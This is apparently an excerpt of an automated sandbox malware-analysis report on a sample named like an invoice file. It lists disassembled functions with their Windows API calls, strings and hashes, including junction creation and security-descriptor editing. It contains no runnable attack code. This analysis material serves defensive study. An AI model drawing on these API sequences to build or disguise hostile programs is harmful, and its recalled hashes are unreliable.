Part of subcall function 004AB526: GetWindowLongW.USER32(?,000000EB), ref: 004AB537

Strings

0, xrefs: 004FCF1B
tooltips_class32, xrefs: 004FCFED, 004FD06E

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
String ID: 0$tooltips_class32
API String ID: 3877571568-3619404913
Opcode ID: 1ff7dd31189cceb988727055d01b022e062164048bbbd4165baf1f55be9b2612
Instruction ID: 3fb4ff59ec33a4d5ca0be95b4229e2d561c20be851dc630a16aed26d8adfbec6
Opcode Fuzzy Hash: 1ff7dd31189cceb988727055d01b022e062164048bbbd4165baf1f55be9b2612
Instruction Fuzzy Hash: CC71A271540309AFD720CF28CC55FB67BE6EB89708F04451EFA8587291DB34E946DB2A

Function 004DAAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 004DAB3D
VariantCopy.OLEAUT32(?,?), ref: 004DAB46
VariantClear.OLEAUT32(?), ref: 004DAB52
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 004DAC40
__swprintf.LIBCMT ref: 004DAC70
VarR8FromDec.OLEAUT32(?,?), ref: 004DAC9C
VariantInit.OLEAUT32(?), ref: 004DAD4D
SysFreeString.OLEAUT32(00000016), ref: 004DADDF
VariantClear.OLEAUT32(?), ref: 004DAE35
VariantClear.OLEAUT32(?), ref: 004DAE44
VariantInit.OLEAUT32(00000000), ref: 004DAE80

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 004DAC6A
Default, xrefs: 004DACFD

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: 9b60011d87118c2ac98e6c7fca3061716bb94b83302be3be3f172919adb48392
Instruction ID: 48e8ae831808ba2be6f11efc17429c590474f3ab5010f711edbc2ff3a721af79
Opcode Fuzzy Hash: 9b60011d87118c2ac98e6c7fca3061716bb94b83302be3be3f172919adb48392
Instruction Fuzzy Hash: C5D1E331A00215EBCB109F56C4A4BAAB7B5FF05700F18845BE5059B381DB7CEC66DBAB

Function 004F716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 004F71FC
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004F7247

Strings

CHECK, xrefs: 004F7267
GETTOTALCOUNT, xrefs: 004F722A
EXISTS, xrefs: 004F72B0
COLLAPSE, xrefs: 004F728D
ISCHECKED, xrefs: 004F73B2
UNCHECK, xrefs: 004F740B
GETSELECTED, xrefs: 004F733F
GETITEMCOUNT, xrefs: 004F7311
GETTEXT, xrefs: 004F7382
EXPAND, xrefs: 004F72E1
SELECT, xrefs: 004F73E0

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: dca0a5bd4ecb40261c2a776eb0d0e4497e79f5ddb6982a84e01abe5575c71498
Instruction ID: 078b5a61496824104d8a13f1dace30a9e32d4f50f3566a1c28d7770d9e56a2be
Opcode Fuzzy Hash: dca0a5bd4ecb40261c2a776eb0d0e4497e79f5ddb6982a84e01abe5575c71498
Instruction Fuzzy Hash: 5D9172342046059BCB04EF25C491A6EBBA1BF55318F00486EFD965B393DB3DED06DB89

Function 004FE4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 004FE5AB
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,004FBEAF), ref: 004FE607
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004FE647
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004FE68C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004FE6C3
FreeLibrary.KERNEL32(?,00000004,?,?,?,?,004FBEAF), ref: 004FE6CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 004FE6DF
DestroyCursor.USER32(?), ref: 004FE6EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 004FE70B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 004FE717

Part of subcall function 004B0FA7: __wcsicmp_l.LIBCMT ref: 004B1030

Strings

.exe, xrefs: 004FE541
.icl, xrefs: 004FE521
.dll, xrefs: 004FE564

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 3907162815-1154884017
Opcode ID: 14b9458044b1ddd209e15856436e62a5324fe48b33b17264c861f1d5c61fd056
Instruction ID: 8ac39ed50fb4405497e99c7c46f36c0e009297ac20cd4289114aa2014e02191b
Opcode Fuzzy Hash: 14b9458044b1ddd209e15856436e62a5324fe48b33b17264c861f1d5c61fd056
Instruction Fuzzy Hash: 9D61E171500219BAEB24DF65CC46FFE7BB8BB18716F108116FA11D61E0EBB89980DB64

Function 004DD219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 0049936C: __swprintf.LIBCMT ref: 004993AB
Part of subcall function 0049936C: __itow.LIBCMT ref: 004993DF

CharLowerBuffW.USER32(?,?), ref: 004DD292
GetDriveTypeW.KERNEL32 ref: 004DD2DF
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004DD327
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004DD35E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004DD38C

Strings

closed, xrefs: 004DD2A6, 004DD2AF
open, xrefs: 004DD2B9
open , xrefs: 004DD2EE
type cdaudio alias cd wait, xrefs: 004DD30A
close, xrefs: 004DD298
close cd wait, xrefs: 004DD377
wait, xrefs: 004DD349
set cd door , xrefs: 004DD32D

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1148790751-4113822522
Opcode ID: 617bea89b1ab56ed3f78056123c195f098256d2703b66016e55a861a19e8c918
Instruction ID: 7055d95516f9235826f303dce7048ef8f6632eaeb3b9d2f4cc08c4f6875e9cd8
Opcode Fuzzy Hash: 617bea89b1ab56ed3f78056123c195f098256d2703b66016e55a861a19e8c918
Instruction Fuzzy Hash: 75515C71504304AFC700EF26C99196EBBE4FF98718F10486EF89567261DB35EE06CB96

Function 004D26BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00503973,00000016,0000138C,00000016,?,00000016,0052DDB4,00000000,?), ref: 004D26F1
LoadStringW.USER32(00000000,?,00503973,00000016), ref: 004D26FA
GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00503973,00000016,0000138C,00000016,?,00000016,0052DDB4,00000000,?,00000016), ref: 004D271C
LoadStringW.USER32(00000000,?,00503973,00000016), ref: 004D271F
__swprintf.LIBCMT ref: 004D276F
__swprintf.LIBCMT ref: 004D2780
_wprintf.LIBCMT ref: 004D2829
MessageBoxW.USER32(00000000,?,?,00011010), ref: 004D2840

Strings

Line %d (File "%s"):, xrefs: 004D2769
Line %d:, xrefs: 004D277A
%s (%d) : ==> %s: %s %s, xrefs: 004D2824
Error: , xrefs: 004D27F7
^ ERROR, xrefs: 004D27D5

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 618562835-2268648507
Opcode ID: 7280786871234accd3a5c963860726ba5be0dfd6fb6dfef24948d7fd9d032d0d
Instruction ID: 1b9e20ec14f17f97592217de03ae11ba9b24932f1bf90255110dcdbfc77adbf9
Opcode Fuzzy Hash: 7280786871234accd3a5c963860726ba5be0dfd6fb6dfef24948d7fd9d032d0d
Instruction Fuzzy Hash: 0C413272800218BACF15FBD1DE97DEEBB78AF15348F10006BF50176092EA686F49DB65

Function 004DD0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 004DD0D8
__swprintf.LIBCMT ref: 004DD0FA
CreateDirectoryW.KERNEL32(?,00000000), ref: 004DD137
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 004DD15C
_memset.LIBCMT ref: 004DD17B
_wcsncpy.LIBCMT ref: 004DD1B7
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 004DD1EC
CloseHandle.KERNEL32(00000000), ref: 004DD1F7
RemoveDirectoryW.KERNEL32(?), ref: 004DD200
CloseHandle.KERNEL32(00000000), ref: 004DD20A

Strings

\, xrefs: 004DD110
\??\%s, xrefs: 004DD0F4
:, xrefs: 004DD11B

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: e95ddc01204ed7aa266655264b5bef7375312f40a905a0d0b92690c99955764a
Instruction ID: 42a82028476a5af6b2248f7c19ca0590d766efe1904d71793df339dc096c4075
Opcode Fuzzy Hash: e95ddc01204ed7aa266655264b5bef7375312f40a905a0d0b92690c99955764a
Instruction Fuzzy Hash: 08318F76900109ABDB219FA1DC49FEF37BCEF89704F1080ABF519D2260E77496459B38

Function 004FE731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,004FBEF4,?,?), ref: 004FE754
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,004FBEF4,?,?,00000000,?), ref: 004FE76B
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,004FBEF4,?,?,00000000,?), ref: 004FE776
CloseHandle.KERNEL32(00000000,?,?,?,?,004FBEF4,?,?,00000000,?), ref: 004FE783
GlobalLock.KERNEL32(00000000), ref: 004FE78C
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,004FBEF4,?,?,00000000,?), ref: 004FE79B
GlobalUnlock.KERNEL32(00000000), ref: 004FE7A4
CloseHandle.KERNEL32(00000000,?,?,?,?,004FBEF4,?,?,00000000,?), ref: 004FE7AB
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 004FE7BC
OleLoadPicture.OLEAUT32(?,00000000,00000000,0051D9BC,?), ref: 004FE7D5
GlobalFree.KERNEL32(00000000), ref: 004FE7E5
GetObjectW.GDI32(00000000,00000018,?), ref: 004FE809
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 004FE834
DeleteObject.GDI32(00000000), ref: 004FE85C
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004FE872

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 7fbc045677e2e1595967512d692fd3553f2222510736568753593b3d4955d0a4
Instruction ID: 7e35003c11c91ec46b1bec3179a4983f2767360034af5af7fcd083c72b2f9752
Opcode Fuzzy Hash: 7fbc045677e2e1595967512d692fd3553f2222510736568753593b3d4955d0a4
Instruction Fuzzy Hash: 21416975600208FFDB11AF66CC88EAB7BB8EF99711F108459F916D7260D7349D45EB20

Function 004E05F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 004E076F
_wcscat.LIBCMT ref: 004E0787
_wcscat.LIBCMT ref: 004E0799
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004E07AE
SetCurrentDirectoryW.KERNEL32(?), ref: 004E07C2
GetFileAttributesW.KERNEL32(?), ref: 004E07DA
SetFileAttributesW.KERNEL32(?,00000000), ref: 004E07F4
SetCurrentDirectoryW.KERNEL32(?), ref: 004E0806

Strings

*.*, xrefs: 004E0845

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 3ada25c5f119b12118f9930e1d3c48c167e99070194a56b004198bb632f8a436
Instruction ID: 2e56e1139e03693fba5dd57c467a2eeff787bf8919db2b223c3998896a894151
Opcode Fuzzy Hash: 3ada25c5f119b12118f9930e1d3c48c167e99070194a56b004198bb632f8a436
Instruction Fuzzy Hash: 0081C3715043819FCB24EF26C444AAFB7E8BB98305F14882FF895C7350E778D9858B5A

Function 004CA867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004CABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004CABD7
Part of subcall function 004CABBB: GetLastError.KERNEL32(?,004CA69F,?,?,?), ref: 004CABE1
Part of subcall function 004CABBB: GetProcessHeap.KERNEL32(00000008,?,?,004CA69F,?,?,?), ref: 004CABF0
Part of subcall function 004CABBB: RtlAllocateHeap.NTDLL(00000000,?,004CA69F), ref: 004CABF7
Part of subcall function 004CABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 004CAC0E

Part of subcall function 004CAC56: GetProcessHeap.KERNEL32(00000008,004CA6B5,00000000,00000000,?,004CA6B5,?), ref: 004CAC62
Part of subcall function 004CAC56: RtlAllocateHeap.NTDLL(00000000,?,004CA6B5), ref: 004CAC69
Part of subcall function 004CAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,004CA6B5,?), ref: 004CAC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004CA8CB
_memset.LIBCMT ref: 004CA8E0
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004CA8FF
GetLengthSid.ADVAPI32(?), ref: 004CA910
GetAce.ADVAPI32(?,00000000,?), ref: 004CA94D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004CA969
GetLengthSid.ADVAPI32(?), ref: 004CA986
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 004CA995
RtlAllocateHeap.NTDLL(00000000), ref: 004CA99C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 004CA9BD
CopySid.ADVAPI32(00000000), ref: 004CA9C4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004CA9F5
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004CAA1B
SetUserObjectSecurity.USER32(?,00000004,?), ref: 004CAA2F

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 2347767575-0
Opcode ID: 4c1a439ddd92f9517d20788327e052f5c567b1d9931566a507f0c727a144b7b8
Instruction ID: f4d61fe8edf4b3583e353df04899b8e330400ae9ad45954680c8f03d964c2d2b
Opcode Fuzzy Hash: 4c1a439ddd92f9517d20788327e052f5c567b1d9931566a507f0c727a144b7b8
Instruction Fuzzy Hash: C8514BB5900209AFDF10DF91DD49EEEBB79FF08308F04811EE911A6290EB39DA15DB65

Function 004DCC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 004DCCA3
LoadStringW.USER32(?,?,00000FFF,?), ref: 004DCCC5
__swprintf.LIBCMT ref: 004DCD1E
__swprintf.LIBCMT ref: 004DCD37
_wprintf.LIBCMT ref: 004DCDED
_wprintf.LIBCMT ref: 004DCE0B

Strings

Line %d (File "%s"):, xrefs: 004DCD18, 004DCD31
"%s" (%d) : ==> %s:%s%s, xrefs: 004DCDE8
Error: , xrefs: 004DCDB5
"%s" (%d) : ==> %s:, xrefs: 004DCE06
^ ERROR, xrefs: 004DCD8F

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-2391861430
Opcode ID: e80d6eac3e90a93a195586fe0a079328e01d2b7210707948af18d145c227188c
Instruction ID: 5803db237ebe54f367a8b71ed4ca33db6f2c5d7a2bc604407dbd7744506c69d6
Opcode Fuzzy Hash: e80d6eac3e90a93a195586fe0a079328e01d2b7210707948af18d145c227188c
Instruction Fuzzy Hash: F2518471800109BACF15EBE1DD96EEEBB79AF14308F10016BF505721A1EB386F59DB64

Function 004DCA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 004DCA8F
LoadStringW.USER32(00000072,?,00000FFF,?), ref: 004DCAB0
__swprintf.LIBCMT ref: 004DCB09
__swprintf.LIBCMT ref: 004DCB22
_wprintf.LIBCMT ref: 004DCBCD
_wprintf.LIBCMT ref: 004DCBEB

Strings

Line %d (File "%s"):, xrefs: 004DCB03, 004DCB1C
"%s" (%d) : ==> %s:%s%s, xrefs: 004DCBC8
Error: , xrefs: 004DCB95
^ ERROR , xrefs: 004DCB64
"%s" (%d) : ==> %s:, xrefs: 004DCBE6

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-3420473620
Opcode ID: b81337722e7359545e281cd753f9e37098ac602bf60cd7472601723586c09f9d
Instruction ID: b17fd6ddef5e08795a6038874805444b40b0a2498f15689853562e37c6fa4f27
Opcode Fuzzy Hash: b81337722e7359545e281cd753f9e37098ac602bf60cd7472601723586c09f9d
Instruction Fuzzy Hash: A951A531900109BACF15EBE1DD96EEEBB78AF14308F10006BF105721A2EB786F59DB65

Function 004D55BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004D55D7
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 004D5664
GetMenuItemCount.USER32(00551708), ref: 004D56ED
DeleteMenu.USER32(00551708,00000005,00000000,000000F5,?,?), ref: 004D577D
